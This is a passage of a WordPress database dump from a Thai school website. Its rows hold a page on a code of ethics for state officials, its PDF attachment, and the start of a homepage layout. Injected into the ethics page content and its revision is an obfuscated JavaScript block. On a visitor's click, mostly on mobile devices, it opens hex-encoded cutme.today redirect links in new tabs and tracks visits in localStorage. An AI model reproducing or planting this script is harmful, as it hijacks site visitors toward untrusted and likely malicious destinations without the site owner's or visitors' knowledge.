_0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ','','publish','closed','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%a7%e0%b8%a5%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%a2%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b9%80%e0%b8%88','','','2024-08-08 17:16:36','2024-08-08 10:16:36','',0,'http://pakhaeng.ssk.in.th/?page_id=716',0,'page','',0),
(717,1,'2024-08-08 17:05:25','2024-08-08 10:05:25','','ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ','','inherit','','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%a7%e0%b8%a5%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%a2%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b9%80%e0%b8%88','','','2024-08-08 17:05:25','2024-08-08 10:05:25','',716,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ.pdf',0,'attachment','application/pdf',0),
(718,1,'2024-08-08 17:05:56','2024-08-08 10:05:56','<!-- wp:file {\"id\":717,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ\"></object><a id=\"wp-block-file--media-6c76f6b2-58bf-4e28-b55d-b85a124820f1\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ.pdf\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-6c76f6b2-58bf-4e28-b55d-b85a124820f1\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ','','inherit','closed','closed','','716-revision-v1','','','2024-08-08 17:05:56','2024-08-08 10:05:56','',716,'http://pakhaeng.ssk.in.th/?p=718',0,'revision','',0),
(719,1,'2024-08-08 17:07:07','2024-08-08 10:07:07','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 